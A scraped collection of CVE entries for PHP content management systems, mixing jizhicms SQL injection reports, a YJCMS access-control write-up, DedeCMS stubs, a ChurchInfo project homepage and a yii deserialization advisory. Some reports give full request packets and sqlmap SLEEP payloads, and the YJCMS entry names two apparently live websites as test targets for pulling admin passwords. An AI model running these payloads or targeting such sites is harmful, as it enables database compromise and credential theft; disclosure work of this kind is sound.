Jizhicms v2.3.3 was discovered to contain a SQL injection vulnerability via the /index.php/admins/Fields/get_fields.html component.

This is one of my favorite CMS, but I found a system vulnerability.  
name：jizhicms  
version: v2.3.3  
Installation package download：  
  
Problematic packets:

> POST /index.php/admins/Fields/get\_fields.html HTTP/1.1  
> Host: 192.168.23.130:49158  
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
> Accept: _/_  
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
> X-Requested-With: XMLHttpRequest  
> Content-Length: 21  
> Origin: http://192.168.23.130:49158  
> Connection: close  
> Referer: http://192.168.23.130:49158/index.php/admins/Extmolds/editmolds/id/1/molds/tags.html  
> Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs
> 
> molds=tags&tid=0&id=1

Background ->SEO settings ->TGA list ->edit, and then capture packages  
  

  
Vulnerability verification exists

payload

    Parameter: molds (POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: molds=tags;SELECT SLEEP(5)#&tid=0&id=3

CVE-2022-45278: jizhicms v2.3.3 has a vulnerability, SQL injection · Issue #83 · Cherry-toto/jizhicms

An issue in the /index/user/user_edit.html component of YJCMS v1.0.9 allows unauthenticated attackers to obtain the Administrator account password.

**YJCMS exist incorrect access control**

1.  **Introduction to YJCMS**

YJcms is developed by gansu yunjing digital technology co., ltd. YJcms (Cloudscape cms) is an open source PHP enterprise website building management system developed based on ThinkPaPHP5.0.24. Yjcms adheres to the concept of minimalist, fast and extreme development, integrates enterprise, tourism and mall modules for development, and is a module and plug-in that can be easily and rapidly expanded. To facilitate developers to quickly build their own applications.

Address of the company's official website：www.eyunjing.cn

Test targets:

1.http://gszhjzx.com/user.html

2.http://lzrzjs.com/user.html

2.  Vulnerability exploitation process

The homepage of the normal website is shown as follows

http://xxx.com/

> http://xxx.com/index/user/user\_edit.html
> 
> Visit The Above Url

You can directly return the system user account and password without authentication information

The password is MD5 encrypted, crack it

Let's visit this

http://xxx.com/user\_login.html

Enter the account password we obtained, in order to check whether the login can be successful

> Enter account: admin123
> 
> Password: admin123

You can see that the website was successfully logged in

CVE-2022-45276: GitHub - Zoe0427/YJCMS

dedecmdv6 6.1.9 is vulnerable to SQL Injection. via sys_sql_query.php.

\[CVE ID\]

CVE-2022-44120

\[PRODUCT\]

DedeCMSV6

\[VERSION\]

V6.1.9

\[PROBLEM TYPE\]

SQL Injection

\[DESCRIPTION\]

DedeCMS v6.1.9 has a sql injection vulnerability

CVE-2022-44120: CVE-2022-44120

dedecmdv6 v6.1.9 is vulnerable to Remote Code Execution (RCE) via file_manage_control.php.

\[CVE ID\]

CVE-2022-44118

\[PRODUCT\]

DedeCMSV6

\[VERSION\]

V6.1.9

\[PROBLEM TYPE\]

code execution

\[DESCRIPTION\]

dedecmdv6 v6.1.9 is vulnerable to Remote Code Execution (RCE) via

CVE-2022-44118: CVE-2022-44118

dedecmdv6 v6.1.9 is vulnerable to Arbitrary file deletion via file_manage_control.php.

\[CVE ID\]

CVE-2022-43196

\[PRODUCT\]

DedeCMSV6

\[VERSION\]

V6.1.9

\[PROBLEM TYPE\]

Arbitrary file deletion

\[DESCRIPTION\]

dedecmdv6 v6.1.9 is vulnerable to Arbitrary file deletion via

CVE-2022-43196: CVE-2022-43196

Jizhicms v2.3.3 was discovered to contain a SQL injection vulnerability via the /Member/memberedit.html component.

**Issue**

SQL injection vulnerabilities exist under the function nodes of new members, and attackers can operate on databases

**Steps to reproduce**

1.  Log in to the background
2.  Click User Management>Member List>Add Member or Edit

Problematic packets:

    POST /index.php/admins/Member/memberedit.html HTTP/1.1
    Host: 192.168.150.136:85
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 241
    Origin: http://192.168.150.136:85
    Connection: close
    Referer: http://192.168.150.136:85/index.php/admins/Member/memberedit/id/1163.html
    Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1665907862; PHPSESSID=k7nc070b0c4h2f1kjo65l54aqf
    
    go=1&id=1163&username=xxxx&openid=&sex=2&gid=0&litpic=&file=&tel=&jifen=0.00&money=0.00&email=&province=&city=&address=&regtime=2022-10-19+19%3A34%3A02&logintime=2022-10-19+19%3A24%3A17&signature=&birthday=&pid=0&isshow=1&pass=&repass=123456
    

use sqlmap: python2 sqlmap.py -r ss.txt --batch -current-db  

    
    ---
    Parameter: id (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: go=1&id=1163' AND (SELECT 3004 FROM (SELECT(SLEEP(5)))lPDg) AND 'fgEo'='fgEo&username=xxxx#&openid=&sex=2&gid=0&litpic=&file=&tel=&jifen=0.00&money=0.00&email=&province=&city=&address=&regtime=2022-10-19 19:34:02&logintime=2022-10-19 19:24:17&signature=&birthday=&pid=0&isshow=1&pass=&repass=123456
    ---

CVE-2022-44140: jizhicms v2.3.3 has a vulnerability, SQL injection · Issue #81 · Cherry-toto/jizhicms

An issue was discovered in JIZHI CMS 1.9.4. There is a CSRF vulnerability that can add an admin account via index, /admin.php/Admin/adminadd.html

\[CVE ID\]

CVE-2021-29334

\[PRODUCT\]

jizhicms

\[VERSION\]

v1.9.4

\[PROBLEM TYPE\]

Cross Site Request Forgery (CSRF)

\[DESCRIPTION\]

An issue was discovered in JIZHI CMS 1.9.4. There is a CSRF,vulnerability that can add an admin account via index.

CVE-2021-29334: CVE-2021-29334

CartView.php in ChurchInfo 1.3.0 allows attackers to achieve remote code execution through insecure uploads. This requires authenticated access tot he ChurchInfo application. Once authenticated, a user can add names to their cart, and compose an email. Uploading an attachment for the email stores the attachment on the site in the /tmp_attach/ folder where it can be accessed with a GET request. There are no limitations on files that can be attached, allowing for malicious PHP code to be uploaded and interpreted by the server.

**Looking for a Flagship Church**

The ChurchInfo team is looking for a flagship church to serve as a focal point for for the development team.  We know that many churches are using our software, and we want to cultivate a special relationship with at least one and possibly several churches to challenge and inspire us.

We can offer the following:

\- Free hosting on churchinfoservices.com, or support on the hosting service of your choice

\- Priority access to support from the development team

\- Priority consideration for the development of new features that are of special interest to your church

In return, we request the following:

\- Use all the features of ChurchInfo that make sense for your church.  ChurchInfo is designed to serve as your only membership database so you only need to maintain membership information in one place.

\- Tell us about any difficulties you have or suggestions for improvement.

The most satisfying thing about supporting the ChurchInfo open source project is knowing that churches can rely on this open-source alternative to expensive church management systems.  If you are looking for a new database solution, or perhaps your first database solution, press the "Contact Us" link toward the upper-right part of this page to inquire.

**Inexpensive Hosting Service Now Available**

After more than twelve years as a purely volunteer venture ChurchInfo has teamed up with a small company called ChurchInfo Services to provide hosting service and automated installation.  This service is designed to be an inexpensive option for churches that don't have access to the necessary technical skills to build and maintain their own installations.  There is no change to the core mission and values of the ChurchInfo project.  The goal is to expand the availability of ChurchInfo to more churches, especially those which found the initial installation to be too much of a hurdle.

Here is a link to the ChurchInfo Services web site.

**Upgrading ChurchInfo**

All versions of ChurchInfo since 1.2.7 are designed to upgrade the database automatically.  Here are the steps to complete the upgrade process:

*   Back up your database using phpMyAdmin.  Select your ChurchInfo database from the list to the left, then select the export tab across the top to the right.  The default export options should be fine and it should give you a copy of your entire database in a ".sql" file.
*   Make a copy of your old file Include/Config.php.  This file contains the database configuration settings near the beginning of the file.
*   If you have been uploading images make a copy of your Images directory with the sub-directories Person, Person/thumbnails, Family, and Family/thumbnails.
*   Extract the ChurchInfo distribution from the .tar.gz file of the .zip file.
*   Copy the new files over your previous installation, making sure they wind up in the same place.  FileZilla is good about doing this recursive upload copy if you need to use FTP.
*   Transfer the database settings from your saved copy of Include/Config.php to the new installation.
*   Log in as usual.  The first thing it will do is upgrade the database, then the new version will be operational.

If you prefer, you can rename your installation directory to set it aside and then install the ChurchInfo distribution into the original installation directory.  If you install this way you will need to copy any image files from the renamed installation directory to the same spot in the new installation.

**Release 1.3.0 Available Now****Major new feature: Self-Service Interface**

The self-service interface allows members to maintain their own personal  
information, enter pledges and electronic payment methods, and make immediate  
or scheduled electronic donations.  This interface is designed to be easily  
embedded in a church web site or it can run stand-alone.  The starting point  
for the self-service interface is SelfRegisterHome.php.

**Support for newer versions of PHP and MySQL (now MariaDB)**

The developers of PHP have obsoleted the mysql library that was used in  
previous versions of ChurchInfo.  This release uses the newest library for  
compatibility with PHP 7.  Many of the developers of MySQL have moved to  
a new purely open-source database called MariaDB which is based on MySQL and  
fully compatibly with ChurchInfo.  Several of the query constructs used in  
previous versions of ChurchInfo are now unsupported and have been updated  
in this release.

**Electronic donations through Vanco**

The new self-service interface supports electronic donations through Vanco  
only.  There will probably be another release soon to support Authorize.NET  
and perhaps Moneris if there is interest.

**Numerous bug fixes and minor improvements**

There are numerous bug fixes and minor improvements in this release.  Details  
are in the Git repository "CodeGit" on SourceForge.

**Moving ChurchInfo**

I often get this question- "How can I move ChurchInfo from one server to another?"  Fortunately, the process for moving ChurchInfo is pretty easy:

\- Use phpMyAdmin to back up the entire database to a sql file  
\- Copy the entire file structure under the churchinfo directory to the new server  
\- Use phpMyAdmin on the destination to create the ChurchInfo database, populate it using the back-up file rather than running SQL/Install.sql  
\- Edit the file Include/Config.php on the destination to establish the database connection on the new server  
\- Log into ChurchInfo on the new server

The only tricky step is editing Include/Config.php.  Hosting services tend to have different and incompatible rules about how databases and database users are named, and the database host may be different from "localhost".

This process transfers everything so all the same logins will still work on the new server.

The nature of the servers does not matter as long as Include/Config.php contains the necessary database connection information.  For my own church I frequently bring the database back to a PC running xampp to try things that I would not try on the active server.

**Read Before Downloading**

ChurchInfo is a web server application, which is nice because you can use it from anywhere with a browser but it isn't your typical download/install application.  If you just want to run stand-alone on a PC please read the article below "Simple Installation on Windows".  You can get the server infrastructure from xampp and then browse to localhost.  The general instructions for installing on any server are in the distribution file Documentation/Readme.txt.  There is a shared demo running on our web site; see article below "Try our demo".  You can also register for a private demo that will run for a few weeks.  See the article below "Private Demos Now Available".  Your experience running a demo on our web site will be exactly the same as running your own installation.  If you have any trouble with the shared demo, or a private demo, please use the "Contact Us" link above and tell us what happened.  We can normally fix issues with the demos the same day.

If you want to use a commercial server please do not use GoDaddy.  Their servers seem to be overwhelmed and trying to use the admin interface is terribly frustrating.

**Demonstration Videos****Introduction Video**

This is a very quick demonstration video showing operation of our demo installation.  You can use the demo any time starting from the link near the bottom of this page.  If the shared demo gets too messed up please send me a message and I will reset it.

Watch introduction

**Self-Service Features Video**

This video uses the nightly build demonstration to show off the new self-services feature in release 1.3.0.  The nightly build is reset every night so it is a good place to do experiments starting from a fresh installation.

Watch self-service

**Financial Features Video**

A lot of people have been watching the quick introduction video so I decided to make another one focusing on the deposit slip.  I get a lot of questions about the financial features of ChurchInfo and this video answers many of the most common questions.  If you would like to see more videos for other subjects please use the contact link to send me email.

Watch financial features  

**Installation Demonstration**

This new video shows the latest version of ChurchInfo being installed on a free server service.

Watch Installation on Free Server

These two videos take you through the entire process of installing on a commercial server.  These videos are older and the server services have improved since the videos were made.  The free server installation above is more representative of modern server services.

Watch installation

Watch test and debug

**Auction Automation**

This video is about using the ChurchInfo FundRaiser feature to facilitate an auction event.

Watch Auction

**Private Demos Now Available**

We can now host private demo installations to facilitate your evaluation process.  These demo installations are created in randomly named directories.  The purpose of these private demos is to give you a chance to experiment in your own space.  You can enter a little data, show your minister and your treasurer how it works, without having to worry about someone changing the admin password or deleting half the menu options.  Your demo space will be private but not particularly secure or permanent.  Please don't put a lot of work into it as it will be deleted in about a week unless you ask for more time.  Assuming your evaluation goes well please plan to download and install in your own world as soon as possible.

Please don't put nonsense for contact information.  Your contact information will only be used to communicate about ChurchInfo and will not be shared or sold for any other purpose.  If you put nonsense in the Private Demo Form your demo will probably be recycled soon and you will get Error 404 page not found while trying to use your private demo.

To get started with your private demo use this link: Private Demo Form

If you have any trouble with the private demo please use the "Contact us" link at the top of the page and tell us what happened.  We should be able to fix it for you.

**To our international users**

You can set the language by changing sLanguage in Admin->Edit General Settings.  ChurchInfo currently supports the following settings: de\_DE (German), en\_AU (Australian English), fr\_FR (French, not updated recently), it\_IT (Italian, not updated recently), nl\_NL (Dutch), pt\_BR (Brazilian Portuguese), sv\_SE (Swedish).  If you would like to develop a new translation please let me know!

**Try our Demo**

We have a demo installation of the latest version 1.3.0 available here The self-service interface for this demo installation is here.

Feel free to play with this database to see if ChurchInfo will work for your church. The password for this demo database is: “demoadmin” for Admin.  See the links below if you find a bug or want to discuss an issue.

**Help Test The Very Latest from the Development Team**

There is an automatically updated installation directly from our Git source control server here.  Please play with this version and report any issues in the bug trackers.  Log in with user name admin, password demoadmin.  No other logins are configured automatically.  If you prefer to take the very latest to your own playground this installation archive .tar.gz file is updated nightly: churchinfo-latest.tar.gz.

**Simple Installation on Windows**

I often get request from people who want to quickly install ChurchInfo on a computer running Windows.  This is a great way to get started and experiment, although the real power of ChurchInfo is best appreciated when it is running on a server and accessed from multiple different computers.  I use this procedure to install ChurchInfo for experimenting or development on a Windows laptop.

I have had good luck hopping back and forth between this stand-alone installation as a real server, simply using phpMyAdmin to back up and restore the database.

Here are the step-by-step instructions:

Install xampp for Windows.  This provides Apache, PHP and MySQL.  I tell it to run Apache and MySQL as services.

Unpack the churchinfo directory from the distribution into the directory C:\\xampp\\htdocs\\churchinfo  
Use Firefox or Chrome to browse to: http://localhost  
Click the phpMyAdmin link  
Select the Privileges tab  
Press Add a new user

Set User name to "churchinfo", Host to "localhost", Password to "churchinfo", Re-type to "churchinfo", enable "create database and assign all priviledges; them press Go (bottom-right)  
Select the new churchinfo database from the link to the left  
Select the Import tab  
Press Browse...  
Navigate to C:\\xampp\\htdocs\\churchinfo\\SQL\\Install.sql and choose this file  
Press the Go button  
Now browse to: http://localhost/churchinfo  
Log in with user name "admin", password "churchinfoadmin"  
It will ask you to change the password immediately.

CVE-2021-43258: ChurchInfo open source church database created with PHP & MySQL! - ChurchInfo open source church database created with PHP & MySQL!

`yiisoft/yii` before version 1.1.27 are vulnerable to Remote Code Execution (RCE) if the application calls `unserialize()` on arbitrary user input. This has been patched in 1.1.27.

High

samdark published GHSA-442f-wcwq-fpcf

Nov 21, 2022

**Package**

composer yiisoft/yii (Composer)

**Affected versions**

<1.1.27

**Patched versions**

1.1.27

**Description**

**Impact**

Affected versions of yiisoft/yii are vulnerable to Remote Code Execution (RCE) if the application calls unserialize() on arbitrary user input.

**Patches**

Upgrade yiisoft/yii to version 1.1.27 or higher.

**For more information**

See the following links for more details:

*   Git commit
*   https://owasp.org/www-community/vulnerabilities/PHP\_Object\_Injection

If you have any questions or comments about this advisory, contact us through security form.

**Severity**

High

8.1

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

High

Privileges required

None

User interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**CVE ID**

CVE-2022-41922

**Weaknesses**

CWE-502

**Credits**

*    fi3wey

CVE-2022-41922: Prevent RCE when deserializing untrusted user input

SQL Injection vulnerability in function get_user in login_manager.php in rizalafani cms-php v1.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tag

#php